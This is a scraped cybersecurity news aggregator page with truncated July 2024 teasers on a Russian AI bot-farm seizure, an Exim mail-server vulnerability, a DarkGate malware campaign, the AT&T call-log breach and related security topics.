The U.S. Department of Justice (DoJ) said it seized two internet domains and searched nearly 1,000 social media accounts that Russian threat actors allegedly used to covertly spread pro-Kremlin disinformation in the country and abroad on a large scale. "The social media bot farm used elements of AI to create fictitious social media profiles — often purporting to belong to individuals in the

 Feed

Two Russian-born Australian citizens have been arrested and charged in the country for spying on behalf of Russia as part of a "complex" law enforcement operation codenamed BURGAZADA. This includes a 40-year-old woman, an Australian Defence Force (ADF) Army Private, and her husband, a 62-year-old self-employed laborer. Media reports have identified them as Kira Korolev and Igor Korolev,

 Feed

In today's digital age, passwords serve as the keys to our most sensitive information, from social media accounts to banking and business systems. This immense power brings with it significant responsibility—and vulnerability. Most people don't realize their credentials have been compromised until the damage is done. Imagine waking up to drained bank accounts, stolen identities, or a company's

 Feed

A critical security issue has been disclosed in the Exim mail transfer agent that could enable threat actors to deliver malicious attachments to target users' inboxes. The vulnerability, tracked as CVE-2024-39929, has a CVSS score of 9.1 out of 10.0. It has been addressed in version 4.98. "Exim through 4.97.1 misparses a multiline RFC 2231 header filename, and thus remote attackers can bypass

 Feed

Cybersecurity researchers have shed light on a short-lived DarkGate malware campaign that leveraged Samba file shares to initiate the infections. Palo Alto Networks Unit 42 said the activity spanned the months of March and April 2024, with the infection chains using servers running public-facing Samba file shares hosting Visual Basic Script (VBS) and JavaScript files. Targets included North

 Cyber Security News

Source: www.databreachtoday.com – Author: 1 Breach Notification , Cybercrime , Fraud Management & Cybercrime Ongoing Law Enforcement Investigation Led to Delay in Public Breach Notification Mathew J. Schwartz (euroinfosec) • July 12, 2024     Image: Shutterstock Attackers have stolen logs of call and   show more ...

text interactions pertaining to nearly every one of AT&T’s millions of […] La entrada AT&T Details Massive Breach of Subscribers’ Call Logs – Source: www.databreachtoday.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: www.databreachtoday.com – Author: 1 Artificial Intelligence & Machine Learning , Governance & Risk Management , Legislation & Litigation New Bill Would Create Data Minimization Measures, Express Permission Requirements Chris Riotta (@chrisriotta) • July 11, 2024     Panelists: Ryan   show more ...

Calo, professor and co-director, University of Washington Tech Policy Lab; Amba Kak, co-executive director, AI […] La entrada Experts: Federal Privacy Law Needed to Curb AI Data Misuse – Source: www.databreachtoday.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Breach

Source: www.databreachtoday.com – Author: 1 Cybercrime , Fraud Management & Cybercrime , Incident & Breach Response Also: Europol Decries Mobile Encryption; FBCS Breach Victim Count Grows Anviksha More (AnvikshaMore) • July 11, 2024     Image: Shutterstock Every week, Information Security Media   show more ...

Group rounds up cybersecurity incidents and breaches around the world. This week, Microsoft […] La entrada Breach Roundup: Microsoft Patches Zero-Day Active Since 2023 – Source: www.databreachtoday.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: www.databreachtoday.com – Author: 1 Breach Notification , HIPAA/HITECH , Security Operations Midyear Analysis of HHS OCR ‘Wall of Shame’ Shows Hacks, Vendor Breaches Top List Marianne Kolbasuk McGee (HealthInfoSec) • July 11, 2024     Image: Getty Images Hacks and vendor incidents   show more ...

continue to dominate major health data breach trends in 2024, but a […] La entrada Major Health Data Breaches: How Are Trends Shifting in 2024? – Source: www.databreachtoday.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: www.databreachtoday.com – Author: 1 David Holmes Research Analyst for Zero Trust, Security, and Risk, Forrester David Holmes is a principal analyst at Forrester, advising security and risk professionals about strategy, architecture, and Zero Trust. His coverage includes security architecture (Zero Trust   show more ...

edge, SASE, microsegmentation, Zero Trust network access), network security controls (firewalls, automated malware […] La entrada Justifying Your Hybrid Cloud Network Security Investment – Source: www.databreachtoday.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: www.databreachtoday.com – Author: 1 Stephanie Chan Security Product Marketing Lead, Google Workspace Stephanie Chan is a B2B enterprise SaaS professional with 15 years of experience driving growth across customer success, product management, and product marketing. She has a proven track record crafting   show more ...

compelling messaging and content, executing successful product launches, and elevating market awareness […] La entrada Live Webinar | Navigating Cyber Threats in the GenAI Era: Proven Security Strategies – Source: www.databreachtoday.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: www.databreachtoday.com – Author: 1 Thank you for registering with ISMG Complete your profile and stay up to date Need help registering? Contact Support Original Post url: https://www.databreachtoday.com/webinars/webinar-old-school-awareness-training-does-hack-anymore-w-5717 Category & Tags:   show more ...

– Views: 0 La entrada Webinar | Old-School Awareness Training Does Not Hack It Anymore – Source: www.databreachtoday.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 authentication

Source: www.databreachtoday.com – Author: 1 Cloud Security , Identity & Access Management , Security Operations Cloud Customers Should Demand More Security From Providers Mathew J. Schwartz (euroinfosec) • July 11, 2024     Snowflake is a case study in the perils of not requiring all accounts to be   show more ...

secured using multifactor authentication. (Image: Shutterstock) The […] La entrada Multifactor Authentication Shouldn’t Be Optional – Source: www.databreachtoday.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: www.databreachtoday.com – Author: 1 How to Make a Plan, Continue to Learn and Leverage Your Experience Brandy Harris • July 11, 2024     Image: Getty Images As a midlevel professional in IT or cybersecurity, you’ve likely honed your skills, built a strong foundation and gained valuable   show more ...

experience. But the evolving landscape of cybersecurity […] La entrada Getting From Midlevel to Specialty Niche in Cybersecurity – Source: www.databreachtoday.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

2024-07
Aggregator history
Friday, July 12
MON
TUE
WED
THU
FRI
SAT
SUN
JulyAugustSeptember